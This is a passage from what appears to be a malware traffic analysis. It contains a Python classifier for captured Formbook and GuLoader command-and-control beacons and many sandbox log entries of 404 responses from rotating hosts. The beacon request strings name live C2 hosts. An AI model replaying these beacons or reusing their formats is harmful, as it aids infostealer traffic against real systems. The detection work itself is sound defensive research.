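    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0\r\n"
    "Host: avocaldoperu.com\r\nConnection: Keep-Alive\r\n\r\n")
GEOPLUGIN_GET = "GET /json.gp HTTP/1.1\r\nHost: geoplugin.net\r\nCache-Control: no-cache\r\n\r\n"
SAMPLES = [FORMBOOK_GET, FORMBOOK_POST, GULOADER_GET, GEOPLUGIN_GET]

if __name__ == "__main__":
    for result in map(classify, SAMPLES):
        print(f'{result["method"]:<4} {result["host"]:<22} {result["verdict"]:<12} {" ".join(result["hits"])}')
    print("rotation hosts:", sorted(c2_hosts(SAMPLES)))
```

The token is the useful pivot: it is the same in every GET in this report while the host changes, so grouping beacons by token rather than by destination reconstructs the rotation list from a proxy log even when most of the hosts answer 404.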
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 28 Aug 2024 12:03:24 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade | Vary: Accept-Encoding | Content-Encoding: gzip | X-Endurance-Cache-Level: 2 | X-nginx-cache: WordPress | Content-Length: 15931 | Content-Type: text/html; charset=UTF-8 | Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 | Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 28 Aug 2024 12:03:27 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade | Vary: Accept-Encoding | Content-Encoding: gzip | X-Endurance-Cache-Level: 2 | X-nginx-cache: WordPress | Content-Length: 15931 | Content-Type: text/html; charset=UTF-8 | Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 | Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 28 Aug 2024 12:03:29 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade | Vary: Accept-Encoding | Content-Encoding: gzip | X-Endurance-Cache-Level: 2 | X-nginx-cache: WordPress | Content-Length: 15931 | Content-Type: text/html; charset=UTF-8 | Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 | Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 28 Aug 2024 12:04:10 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_5063416e1289b199f2413e8737e4ca%7C%7C1725019450%7C%7C1725015850%7C%7Cceb62e721885b64e1797ee288a644a39; expires=Fri, 30-Aug-2024 12:04:10 GMT; Max-Age=172800; path=/; HttpOnly | link: <https://katasoo.com/wp-json/>; rel="https://api.w.org/" | vary: Accept-Encoding | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7Jb45O%2F58zDZA7wBpQvRHF%2FnNwZ%2BtBualZ1TqGrDukHaoO%2FFAOZU5vBUn%2FNvODMGvQRKOP7N10CqreOWygb2jVDdpqVneUfd2J3z3LR%2B5T78GrEGva1tFzZq9wOBaJbhzY%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8ba4298e590842f1-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | Data Raw: 33 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 6e b6 64 39 9b 49 a7 a7 7b 27 99 f4 b4 d3 5f 7f bd 89 57 07 22 21 89 36 45 32 04 69 d9 ed d6 03 ed 6b ec 93 ed 29 00 24 41 8a ba f8 92 99 d9 b3 5f cf c4 92 80 42 a1 50 00 0a 85 42 a1 70 fa ec fb 8f 6f 3f fd fe f3 3b 34 4f 16 fe d9 e1 e9 33 4d fb ec 4d d1 4f ef d0 09 ba 38 43 a7 90 8c 7c 1c cc 46 0a 09 b4 5f cf 15 e4 f8 98 d2 91 e2 91 13 e4 87 d8 f5 82 99 46 bd 84 a0 20 d4 2e a9 72 86 4e 9f 7d 26 81 eb 4d 2f 34 ad 84 ef 78 17 be e3 7b e0 6b ce 12 c2 88 6c fd f9 ac f9 d3 bb d6 c5 19 e4 9c 6d | Data Ascii: 36c9}v8o}XRnd9I{'_W"!6E2ik)$A_BPBpo?;4O3MMO8C|F_F .rN}&M/4x{klm
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 28 Aug 2024 12:04:13 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_ffb160b8a35cf1a8ebfd13dcf4b1ef%7C%7C1725019453%7C%7C1725015853%7C%7C1698686f1ff4342c0ee039076d21f46f; expires=Fri, 30-Aug-2024 12:04:13 GMT; Max-Age=172800; path=/; HttpOnly | link: <https://katasoo.com/wp-json/>; rel="https://api.w.org/" | vary: Accept-Encoding | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAHIDblWZMBoVnCky%2BdXB78e9qmR%2FCMHlo5MNucYLNiG1BtPr%2Fkl0ckJc0UWdKoshdPzns%2B8HqBwAL4wwTGhJXM05S%2BmopFWTc%2B3qlvShCLzvK8O0KBauO%2BVlb73sWPliT0%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8ba4299e0a1f429d-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | Data Raw: 33 36 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d ed 76 db 38 b2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 6f 7d d8 96 2c 67 33 e9 f4 74 ef 24 93 9e 76 fa f6 ed 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b7 1f 68 5f 63 9f 6c 4f 01 20 09 52 a4 24 7f 64 66 f6 ec ed 99 58 12 50 28 14 0a 40 a1 50 28 14 4e 9e 7d ff f1 ed a7 df 7f 7e 87 16 c9 d2 3f dd 3f 79 a6 69 9f bd 19 fa e9 1d 3a 46 e7 a7 e8 04 92 91 8f 83 f9 58 21 81 f6 eb 99 82 1c 1f 53 3a 56 3c 72 8c fc 10 bb 5e 30 d7 a8 97 10 14 84 da 05 55 4e d1 c9 b3 cf 24 70 bd d9 b9 a6 95 f0 1d 6d c3 77 74 0f 7c ed 79 42 18 91 9d 3f 9f b5 7f 7a d7 39 3f 85 | Data Ascii: 36c6}v8o}XRo},g3t$vM:I)!Hnh_clO R$dfXP(@P(N}~??yi:FX!S:V<r^0UN$pmwt|yB?z9?
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 28 Aug 2024 12:04:15 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_b21e6b470e46914bacef13fb9474ae%7C%7C1725019455%7C%7C1725015855%7C%7Cb952974e6c119af1c02ddd0a324ce78b; expires=Fri, 30-Aug-2024 12:04:15 GMT; Max-Age=172800; path=/; HttpOnly | link: <https://katasoo.com/wp-json/>; rel="https://api.w.org/" | vary: Accept-Encoding | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7YaOfMKytBCR1sb9a1fQDo870HlpHNeUvOL8WqcjvG1QL41DxFQ4h3GrhguKz7SpjCNuwo%2Flw4CSNSP%2BeRdzAmMzTNaaNhZ5KkwXBlt%2FU3lna1QF5DGZ9VeqQHJpSNLwSI%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8ba429addc408cdd-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | Data Raw: 33 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 2e b6 25 cb d9 4c 3a 3d dd 3b c9 a4 a7 9d fe fa eb 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b5 1e 68 5f 63 9f 6c 4f 01 20 09 52 d4 c5 97 cc cc 9e fd 7a 26 96 04 14 0a 85 02 50 28 14 0a 85 b3 67 df 7f 7c fb e9 f7 9f df a1 59 32 f7 cf 0f cf 9e 69 da 67 6f 82 7e 7a 87 4e d1 e5 39 3a 83 64 e4 e3 60 3a 54 48 a0 fd 7a a1 20 c7 c7 94 0e 15 8f 9c 22 3f c4 ae 17 4c 35 ea 25 04 05 a1 76 45 95 73 74 f6 ec 33 09 5c 6f 72 a9 69 25 7c 27 bb f0 9d dc 03 5f 73 9a 10 46 64 eb cf 67 cd 9f de b5 2e cf 21 e7 7c 33 fa 0d a8 35 ad | Data Ascii: 36c8}v8o}XR.%L:=;M:I)!Hnh_clO Rz&P(g|Y2igo~zN9:d`:THz "?L5%vEst3\ori%|'_sFdg.!|35
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 28 Aug 2024 12:05:04 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 28 Aug 2024 12:05:07 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 28 Aug 2024 12:05:09 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 28 Aug 2024 12:05:12 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 